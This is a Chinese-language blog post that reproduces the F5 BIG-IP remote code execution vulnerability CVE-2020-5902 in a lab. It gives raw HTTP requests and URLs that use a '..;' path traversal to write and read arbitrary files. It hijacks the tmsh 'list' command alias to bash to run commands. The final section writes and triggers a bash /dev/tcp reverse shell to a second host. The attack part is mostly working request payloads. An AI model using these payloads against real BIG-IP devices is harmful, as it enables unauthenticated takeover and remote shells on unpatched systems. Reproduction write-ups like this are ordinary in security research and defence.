<!DOCTYPE html>
<html>
<head>
    

    

    



    <meta charset="utf-8">
    
    
    
    
    <title>CVE-2020-5902：F5 BIG-IP 远程代码执行漏洞复现 | 小白帽</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <meta name="theme-color" content="#3F51B5">
    
    
    <meta name="keywords" content="">
    <meta name="description" content="影响版本 BIG-IP 15.x: 15.1.0&#x2F;15.0.0BIG-IP 14.x: 14.1.0 ~ 14.1.2BIG-IP 13.x: 13.1.0 ~ 13.1.3BIG-IP 12.x: 12.1.0 ~ 12.1.5BIG-IP 11.x: 11.6.1 ~ 11.6.5 环境搭建12下载https:&#x2F;&#x2F;downloads.f5.com&#x2F;esd&#x2F;ecc.sv?sw&#x3D;BIG-IP&amp;am">
<meta property="og:type" content="article">
<meta property="og:title" content="CVE-2020-5902：F5 BIG-IP 远程代码执行漏洞复现">
<meta property="og:url" content="https://www.yuque.com/xiaogege-yxttw/2020/07/28/pqp9in/index.html">
<meta property="og:site_name" content="小白帽">
<meta property="og:description" content="影响版本 BIG-IP 15.x: 15.1.0&#x2F;15.0.0BIG-IP 14.x: 14.1.0 ~ 14.1.2BIG-IP 13.x: 13.1.0 ~ 13.1.3BIG-IP 12.x: 12.1.0 ~ 12.1.5BIG-IP 11.x: 11.6.1 ~ 11.6.5 环境搭建12下载https:&#x2F;&#x2F;downloads.f5.com&#x2F;esd&#x2F;ecc.sv?sw&#x3D;BIG-IP&amp;am">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595406539692-843782cb-5d6b-435f-8da4-f6099d5549ae.png#align=left&display=inline&height=392&margin=%5Bobject%20Object%5D&name=image.png&originHeight=784&originWidth=1205&size=95193&status=done&style=none&width=602.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595407668199-dae3aca8-3f11-47d4-b84e-0d0e95c37c7b.png#align=left&display=inline&height=256&margin=%5Bobject%20Object%5D&name=image.png&originHeight=511&originWidth=1900&size=108261&status=done&style=none&width=950">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595408339314-286fa910-502c-41ac-bc36-b6ba104cc204.png#align=left&display=inline&height=268&margin=%5Bobject%20Object%5D&name=image.png&originHeight=535&originWidth=1920&size=98768&status=done&style=none&width=960">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595409948182-1b91b169-68e5-451a-9073-52f9b6f1ca7c.png#align=left&display=inline&height=204&margin=%5Bobject%20Object%5D&name=image.png&originHeight=408&originWidth=1920&size=81576&status=done&style=none&width=960">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595409975823-593a24dc-3ed7-468e-ae1f-60132ad2bf57.png#align=left&display=inline&height=56&margin=%5Bobject%20Object%5D&name=image.png&originHeight=112&originWidth=690&size=7521&status=done&style=none&width=345">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595408641311-48960032-fdf0-4ea6-9c41-2c598b940550.png#align=left&display=inline&height=142&margin=%5Bobject%20Object%5D&name=image.png&originHeight=283&originWidth=1920&size=52760&status=done&style=none&width=960">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595409260719-7eef6bb4-f07e-4542-a87a-dfd9e31d075e.png#align=left&display=inline&height=540&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1080&originWidth=1920&size=253056&status=done&style=none&width=960">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595410314472-59e741f5-e724-4142-99c9-ef9c0ca6a9d4.png#align=left&display=inline&height=207&margin=%5Bobject%20Object%5D&name=image.png&originHeight=413&originWidth=1920&size=82603&status=done&style=none&width=960">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595410336735-c2d8bc3e-c5ab-4678-a99f-64f150ed58bb.png#align=left&display=inline&height=75&margin=%5Bobject%20Object%5D&name=image.png&originHeight=150&originWidth=698&size=8772&status=done&style=none&width=349">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595410856388-e7c4b0be-2157-4775-8d80-24f1d5530140.png#align=left&display=inline&height=340&margin=%5Bobject%20Object%5D&name=image.png&originHeight=679&originWidth=1920&size=97449&status=done&style=none&width=960">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595413482404-4d48bf5f-3096-44f7-8405-5c55ba556b59.png#align=left&display=inline&height=313&margin=%5Bobject%20Object%5D&name=image.png&originHeight=625&originWidth=1920&size=112298&status=done&style=none&width=960">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595411481244-c61dfbc1-0c4c-46ba-a355-8d3a4cd369fe.png#align=left&display=inline&height=339&margin=%5Bobject%20Object%5D&name=image.png&originHeight=677&originWidth=1920&size=106105&status=done&style=none&width=960">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595495114473-0d881d34-783d-4de5-8bc9-bb70e2dad505.png#align=left&display=inline&height=70&margin=%5Bobject%20Object%5D&name=image.png&originHeight=70&originWidth=565&size=5366&status=done&style=none&width=565">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595495185115-2b87089b-3667-4e74-b934-13b1f7954479.png#align=left&display=inline&height=241&margin=%5Bobject%20Object%5D&name=image.png&originHeight=482&originWidth=1508&size=119550&status=done&style=none&width=754">
<meta property="article:published_time" content="2020-07-28T06:03:08.000Z">
<meta property="article:modified_time" content="2020-08-14T15:17:21.034Z">
<meta property="article:author" content="无名之辈">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595406539692-843782cb-5d6b-435f-8da4-f6099d5549ae.png#align=left&display=inline&height=392&margin=%5Bobject%20Object%5D&name=image.png&originHeight=784&originWidth=1205&size=95193&status=done&style=none&width=602.5">
    
    <link rel="shortcut icon" href="/favicon.ico">
    <link rel="stylesheet" href="//unpkg.com/hexo-theme-material-indigo@latest/css/style.css">
    <script>window.lazyScripts=[]</script>

    <!-- custom head -->
    

<meta name="generator" content="Hexo 4.2.1"></head>

<body>
    <div id="loading" class="active"></div>

    <aside id="menu" class="hide" >
  <div class="inner flex-row-vertical">
    <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menu-off">
        <i class="icon icon-lg icon-close"></i>
    </a>
    <div class="brand-wrap" style="background-image:url(/img/brand.jpg)">
      <div class="brand">
        <a href="/" class="avatar waves-effect waves-circle waves-light">
          <img src="/img/avatar.jpg">
        </a>
        <hgroup class="introduce">
          <h5 class="nickname">无名之辈</h5>
          <a href="mailto:3389006233@qq.com" title="3389006233@qq.com" class="mail">3389006233@qq.com</a>
        </hgroup>
      </div>
    </div>
    <div class="scroll-wrap flex-col">
      <ul class="nav">
        
            <li class="waves-block waves-effect">
              <a href="/"  >
                <i class="icon icon-lg icon-home"></i>
                主页
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="https://github.com/wakaka123wakaka" target="_blank" >
                <i class="icon icon-lg icon-github"></i>
                Github
              </a>
            </li>
        
      </ul>
    </div>
  </div>
</aside>

    <main id="main">
        <header class="top-header" id="header">
    <div class="flex-row">
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light on" id="menu-toggle">
          <i class="icon icon-lg icon-navicon"></i>
        </a>
        <div class="flex-col header-title ellipsis">CVE-2020-5902：F5 BIG-IP 远程代码执行漏洞复现</div>
        
        <div class="search-wrap" id="search-wrap">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="back">
                <i class="icon icon-lg icon-chevron-left"></i>
            </a>
            <input type="text" id="key" class="search-input" autocomplete="off" placeholder="Search">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="search">
                <i class="icon icon-lg icon-search"></i>
            </a>
        </div>
        
        
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menuShare">
            <i class="icon icon-lg icon-share-alt"></i>
        </a>
        
    </div>
</header>
<header class="content-header post-header">

    <div class="container fade-scale">
        <h1 class="title">CVE-2020-5902：F5 BIG-IP 远程代码执行漏洞复现</h1>
        <h5 class="subtitle">
            
                <time datetime="2020-07-28T06:03:08.000Z" itemprop="datePublished" class="page-time">
  2020-07-28
</time>


            
        </h5>
    </div>

    


</header>
<meta name="referrer" content="no-referrer" />
<script type="text/javascript" src="hexo_resize_image.js"></script>

<div class="container body-wrap">
    
    <aside class="post-widget">
        <nav class="post-toc-wrap post-toc-shrink" id="post-toc">
            <h4>TOC</h4>
            <ol class="post-toc"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#环境搭建"><span class="post-toc-number">1.</span> <span class="post-toc-text">环境搭建</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#漏洞复现"><span class="post-toc-number">2.</span> <span class="post-toc-text">漏洞复现</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#任意文件上传"><span class="post-toc-number">2.1.</span> <span class="post-toc-text">任意文件上传</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#文件上传一："><span class="post-toc-number">2.1.1.</span> <span class="post-toc-text">文件上传一：</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#"><span class="post-toc-number">2.1.2.</span> <span class="post-toc-text">
                
                    
                    
                
                image.png
            </span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#文件上传二："><span class="post-toc-number">2.1.3.</span> <span class="post-toc-text">文件上传二：</span></a></li></ol></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#任意文件读取："><span class="post-toc-number">2.2.</span> <span class="post-toc-text">任意文件读取：</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#任意命令执行"><span class="post-toc-number">2.3.</span> <span class="post-toc-text">任意命令执行</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#修改-alias-劫持-list-命令为-bash"><span class="post-toc-number">2.3.1.</span> <span class="post-toc-text">修改 alias 劫持 list 命令为 bash</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#写入-bash-文件"><span class="post-toc-number">2.3.2.</span> <span class="post-toc-text">写入 bash 文件</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#命令执行"><span class="post-toc-number">2.3.3.</span> <span class="post-toc-text">命令执行</span></a></li></ol></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#还原-list-命令"><span class="post-toc-number">2.4.</span> <span class="post-toc-text">还原 list 命令</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#反弹-shell"><span class="post-toc-number">2.5.</span> <span class="post-toc-text">反弹 shell</span></a></li></ol></li></ol>
        </nav>
    </aside>


<article id="post-pqp9in"
  class="post-article article-type-post fade" itemprop="blogPost">

    <div class="post-card">
        <h1 class="post-card-title">CVE-2020-5902：F5 BIG-IP 远程代码执行漏洞复现</h1>
        <div class="post-meta">
            <time class="post-time" title="2020-07-28 14:03:08" datetime="2020-07-28T06:03:08.000Z"  itemprop="datePublished">2020-07-28</time>

            


            
<span id="busuanzi_container_page_pv" title="文章总阅读量" style='display:none'>
    <i class="icon icon-eye icon-pr"></i><span id="busuanzi_value_page_pv"></span>
</span>


        </div>
        <div class="post-content" id="post-content" itemprop="postContent">
            <p><strong>影响版本</strong></p>
<p>BIG-IP 15.x: 15.1.0/15.0.0<br>BIG-IP 14.x: 14.1.0 ~ 14.1.2<br>BIG-IP 13.x: 13.1.0 ~ 13.1.3<br>BIG-IP 12.x: 12.1.0 ~ 12.1.5<br>BIG-IP 11.x: 11.6.1 ~ 11.6.5</p>
<h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">下载</span><br><span class="line">https://downloads.f5.com/esd/ecc.sv?sw=BIG<span class="literal">-IP</span>&amp;pro=big<span class="literal">-ip_v15</span>.x&amp;ver=<span class="number">15.1</span>.<span class="number">0</span>&amp;container=Virtual<span class="literal">-Edition</span></span><br></pre></td></tr></table></figure>

<p>访问：<a href="https://192.168.56.93/tmui/login.jsp" target="_blank" rel="noopener">https://192.168.56.93/</a></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595406539692-843782cb-5d6b-435f-8da4-f6099d5549ae.png#align=left&display=inline&height=392&margin=%5Bobject%20Object%5D&name=image.png&originHeight=784&originWidth=1205&size=95193&status=done&style=none&width=602.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h2><p>nmap 脚本：<a href="https://www.yuque.com/attachments/yuque/0/2020/zip/258143/1595916189004-b430281c-9b29-44f9-9a49-1336b0073eca.zip?_lake_card=%7B%22uid%22%3A%221595407173963-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fzip%2F258143%2F1595916189004-b430281c-9b29-44f9-9a49-1336b0073eca.zip%22%2C%22name%22%3A%22http-vuln-cve2020-5902.zip%22%2C%22size%22%3A1793%2C%22type%22%3A%22application%2Fx-zip-compressed%22%2C%22ext%22%3A%22zip%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%22k0CXk%22%2C%22card%22%3A%22file%22%7D">http-vuln-cve2020-5902.zip</a></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595407668199-dae3aca8-3f11-47d4-b84e-0d0e95c37c7b.png#align=left&display=inline&height=256&margin=%5Bobject%20Object%5D&name=image.png&originHeight=511&originWidth=1900&size=108261&status=done&style=none&width=950" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>\*\*

<h3 id="任意文件上传"><a href="#任意文件上传" class="headerlink" title="任意文件上传"></a>任意文件上传</h3><h4 id="文件上传一："><a href="#文件上传一：" class="headerlink" title="文件上传一："></a>文件上传一：</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">POST &#x2F;tmui&#x2F;login.jsp&#x2F;..;&#x2F;tmui&#x2F;locallb&#x2F;workspace&#x2F;fileSave.jsp HTTP&#x2F;1.1</span><br><span class="line">Host: 192.168.56.93</span><br><span class="line">Connection: close</span><br><span class="line">Cache-Control: max-age&#x3D;0</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">Content-Type: application&#x2F;x-www-form-urlencoded</span><br><span class="line">User-Agent: Mozilla&#x2F;5.0 (Windows NT 10.0; Win64; x64) AppleWebKit&#x2F;537.36 (KHTML, like Gecko) Chrome&#x2F;84.0.4147.89 Safari&#x2F;537.36</span><br><span class="line">Accept: text&#x2F;html,application&#x2F;xhtml+xml,application&#x2F;xml;q&#x3D;0.9,image&#x2F;webp,image&#x2F;apng,*&#x2F;*;q&#x3D;0.8,application&#x2F;signed-exchange;v&#x3D;b3;q&#x3D;0.9</span><br><span class="line">Sec-Fetch-Site: same-origin</span><br><span class="line">Sec-Fetch-Mode: navigate</span><br><span class="line">Sec-Fetch-User: ?1</span><br><span class="line">Sec-Fetch-Dest: document</span><br><span class="line">Referer: https:&#x2F;&#x2F;192.168.56.93&#x2F;tmui&#x2F;login.jsp</span><br><span class="line">Accept-Language: zh-CN,zh;q&#x3D;0.9,ko;q&#x3D;0.8,zh-TW;q&#x3D;0.7,en;q&#x3D;0.6</span><br><span class="line">Cookie: JSESSIONID&#x3D;B1980CD16AD5E97F597175149BCD19CE</span><br><span class="line">Content-Length: 49</span><br><span class="line"></span><br><span class="line">fileName&#x3D;&#x2F;tmp&#x2F;success&amp;content&#x3D;CVE-2020-5902</span><br></pre></td></tr></table></figure>

<h4 id=""><a href="#" class="headerlink" title=""></a><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595408339314-286fa910-502c-41ac-bc36-b6ba104cc204.png#align=left&display=inline&height=268&margin=%5Bobject%20Object%5D&name=image.png&originHeight=535&originWidth=1920&size=98768&status=done&style=none&width=960" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure></h4><h4 id="文件上传二："><a href="#文件上传二：" class="headerlink" title="文件上传二："></a>文件上传二：</h4><p><code>https://192.168.56.93/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/test1&amp;content=id</code></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595409948182-1b91b169-68e5-451a-9073-52f9b6f1ca7c.png#align=left&display=inline&height=204&margin=%5Bobject%20Object%5D&name=image.png&originHeight=408&originWidth=1920&size=81576&status=done&style=none&width=960" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595409975823-593a24dc-3ed7-468e-ae1f-60132ad2bf57.png#align=left&display=inline&height=56&margin=%5Bobject%20Object%5D&name=image.png&originHeight=112&originWidth=690&size=7521&status=done&style=none&width=345" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h3 id="任意文件读取："><a href="#任意文件读取：" class="headerlink" title="任意文件读取："></a>任意文件读取：</h3><p><code>https://192.168.56.93/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/tmp/success</code></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595408641311-48960032-fdf0-4ea6-9c41-2c598b940550.png#align=left&display=inline&height=142&margin=%5Bobject%20Object%5D&name=image.png&originHeight=283&originWidth=1920&size=52760&status=done&style=none&width=960" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h3 id="任意命令执行"><a href="#任意命令执行" class="headerlink" title="任意命令执行"></a>任意命令执行</h3><h4 id="修改-alias-劫持-list-命令为-bash"><a href="#修改-alias-劫持-list-命令为-bash" class="headerlink" title="修改 alias 劫持 list 命令为 bash"></a>修改 alias 劫持 list 命令为 bash</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">GET &#x2F;tmui&#x2F;login.jsp&#x2F;..;&#x2F;tmui&#x2F;locallb&#x2F;workspace&#x2F;tmshCmd.jsp?command&#x3D;create+cli+alias+private+list+command+bash HTTP&#x2F;1.1</span><br><span class="line">Host: 192.168.56.93</span><br><span class="line">Connection: close</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">User-Agent: Mozilla&#x2F;5.0 (Windows NT 10.0; Win64; x64) AppleWebKit&#x2F;537.36 (KHTML, like Gecko) Chrome&#x2F;84.0.4147.89 Safari&#x2F;537.36</span><br><span class="line">Accept: text&#x2F;html,application&#x2F;xhtml+xml,application&#x2F;xml;q&#x3D;0.9,image&#x2F;webp,image&#x2F;apng,*&#x2F;*;q&#x3D;0.8,application&#x2F;signed-exchange;v&#x3D;b3;q&#x3D;0.9</span><br><span class="line">Sec-Fetch-Site: none</span><br><span class="line">Sec-Fetch-Mode: navigate</span><br><span class="line">Sec-Fetch-User: ?1</span><br><span class="line">Sec-Fetch-Dest: document</span><br><span class="line">Accept-Language: zh-CN,zh;q&#x3D;0.9,ko;q&#x3D;0.8,zh-TW;q&#x3D;0.7,en;q&#x3D;0.6</span><br><span class="line">Cookie: JSESSIONID&#x3D;B1980CD16AD5E97F597175149BCD19CE</span><br></pre></td></tr></table></figure>

<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595409260719-7eef6bb4-f07e-4542-a87a-dfd9e31d075e.png#align=left&display=inline&height=540&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1080&originWidth=1920&size=253056&status=done&style=none&width=960" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h4 id="写入-bash-文件"><a href="#写入-bash-文件" class="headerlink" title="写入 bash 文件"></a>写入 bash 文件</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">GET &#x2F;tmui&#x2F;login.jsp&#x2F;..;&#x2F;tmui&#x2F;locallb&#x2F;workspace&#x2F;fileSave.jsp?fileName&#x3D;&#x2F;tmp&#x2F;test3&amp;content&#x3D;ifconfig HTTP&#x2F;1.1</span><br><span class="line">Host: 192.168.56.93</span><br><span class="line">Connection: close</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">User-Agent: Mozilla&#x2F;5.0 (Windows NT 10.0; Win64; x64) AppleWebKit&#x2F;537.36 (KHTML, like Gecko) Chrome&#x2F;84.0.4147.89 Safari&#x2F;537.36</span><br><span class="line">Accept: text&#x2F;html,application&#x2F;xhtml+xml,application&#x2F;xml;q&#x3D;0.9,image&#x2F;webp,image&#x2F;apng,*&#x2F;*;q&#x3D;0.8,application&#x2F;signed-exchange;v&#x3D;b3;q&#x3D;0.9</span><br><span class="line">Sec-Fetch-Site: none</span><br><span class="line">Sec-Fetch-Mode: navigate</span><br><span class="line">Sec-Fetch-User: ?1</span><br><span class="line">Sec-Fetch-Dest: document</span><br><span class="line">Accept-Language: zh-CN,zh;q&#x3D;0.9,ko;q&#x3D;0.8,zh-TW;q&#x3D;0.7,en;q&#x3D;0.6</span><br><span class="line">Cookie: JSESSIONID&#x3D;B1980CD16AD5E97F597175149BCD19CE</span><br></pre></td></tr></table></figure>

<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595410314472-59e741f5-e724-4142-99c9-ef9c0ca6a9d4.png#align=left&display=inline&height=207&margin=%5Bobject%20Object%5D&name=image.png&originHeight=413&originWidth=1920&size=82603&status=done&style=none&width=960" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595410336735-c2d8bc3e-c5ab-4678-a99f-64f150ed58bb.png#align=left&display=inline&height=75&margin=%5Bobject%20Object%5D&name=image.png&originHeight=150&originWidth=698&size=8772&status=done&style=none&width=349" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h4 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h4><p>1、执行 bash 文件（未登录）<br><code>https://192.168.56.93/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/test</code></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595410856388-e7c4b0be-2157-4775-8d80-24f1d5530140.png#align=left&display=inline&height=340&margin=%5Bobject%20Object%5D&name=image.png&originHeight=679&originWidth=1920&size=97449&status=done&style=none&width=960" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>2、执行 bash 文件（已登录）</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595413482404-4d48bf5f-3096-44f7-8405-5c55ba556b59.png#align=left&display=inline&height=313&margin=%5Bobject%20Object%5D&name=image.png&originHeight=625&originWidth=1920&size=112298&status=done&style=none&width=960" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>注意：登录成功未成功的标志在于 cookie</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">#登录未成功</span><br><span class="line">Cookie: JSESSIONID&#x3D;C0A2E25AA53FBAB8A64B71F3045DCC63</span><br><span class="line">#登录成功</span><br><span class="line">Cookie: JSESSIONID&#x3D;C0A2E25AA53FBAB8A64B71F3045DCC63; BIGIPAuthCookie&#x3D;9856A49B5237A13A081CA03BB37CCFF3039DB71B; BIGIPAuthUsernameCookie&#x3D;admin; F5_CURRENT_PARTITION&#x3D;Common; f5formpage&#x3D;&quot;&#x2F;tmui&#x2F;overview&#x2F;welcome&#x2F;introduction.jsp?&amp;setup&#x3D;true&quot;</span><br></pre></td></tr></table></figure>

<h3 id="还原-list-命令"><a href="#还原-list-命令" class="headerlink" title="还原 list 命令"></a>还原 list 命令</h3><p><code>curl -k &quot;https://192.168.56.93/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list&quot;</code></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595411481244-c61dfbc1-0c4c-46ba-a355-8d3a4cd369fe.png#align=left&display=inline&height=339&margin=%5Bobject%20Object%5D&name=image.png&originHeight=677&originWidth=1920&size=106105&status=done&style=none&width=960" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h3 id="反弹-shell"><a href="#反弹-shell" class="headerlink" title="反弹 shell"></a>反弹 shell</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">#劫持list命令</span><br><span class="line">https:&#x2F;&#x2F;192.168.56.84&#x2F;tmui&#x2F;login.jsp&#x2F;..;&#x2F;tmui&#x2F;locallb&#x2F;workspace&#x2F;tmshCmd.jsp?command&#x3D;create+cli+alias+private+list+command+bash</span><br><span class="line">#bash文件写入（bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;192.168.56.212&#x2F;1234 0&gt;&amp;1）url编码</span><br><span class="line">https:&#x2F;&#x2F;192.168.56.84&#x2F;tmui&#x2F;login.jsp&#x2F;..;&#x2F;tmui&#x2F;locallb&#x2F;workspace&#x2F;fileSave.jsp?fileName&#x3D;&#x2F;tmp&#x2F;test6&amp;content&#x3D;bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.56.212%2F1234+0%3E%261</span><br><span class="line">#反弹shell</span><br><span class="line">https:&#x2F;&#x2F;192.168.56.84&#x2F;tmui&#x2F;login.jsp&#x2F;..;&#x2F;tmui&#x2F;locallb&#x2F;workspace&#x2F;tmshCmd.jsp?command&#x3D;list+&#x2F;tmp&#x2F;test6</span><br></pre></td></tr></table></figure>

<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595495114473-0d881d34-783d-4de5-8bc9-bb70e2dad505.png#align=left&display=inline&height=70&margin=%5Bobject%20Object%5D&name=image.png&originHeight=70&originWidth=565&size=5366&status=done&style=none&width=565" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595495185115-2b87089b-3667-4e74-b934-13b1f7954479.png#align=left&display=inline&height=241&margin=%5Bobject%20Object%5D&name=image.png&originHeight=482&originWidth=1508&size=119550&status=done&style=none&width=754" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

        </div>

        <blockquote class="post-copyright">
    
    <div class="content">
        
<span class="post-time">
    Last updated: <time datetime="2020-08-14T15:17:21.034Z" itemprop="dateUpdated">2020-08-14 23:17:21</time>
</span><br>


        
        这里可以写作者留言，标签和 hexo 中所有变量及辅助函数等均可调用，示例：<a href="/2020/07/28/pqp9in/" target="_blank" rel="external">https://www.yuque.com/xiaogege-yxttw/2020/07/28/pqp9in/</a>
        
    </div>
    
    <footer>
        <a href="https://www.yuque.com/xiaogege-yxttw">
            <img src="/img/avatar.jpg" alt="无名之辈">
            无名之辈
        </a>
    </footer>
</blockquote>

        
<div class="page-reward">
    <a id="rewardBtn" href="javascript:;" class="page-reward-btn waves-effect waves-circle waves-light">赏</a>
</div>



        <div class="post-footer">
            

            
<div class="page-share-wrap">
    

<div class="page-share" id="pageShare">
    <ul class="reset share-icons">
      <li>
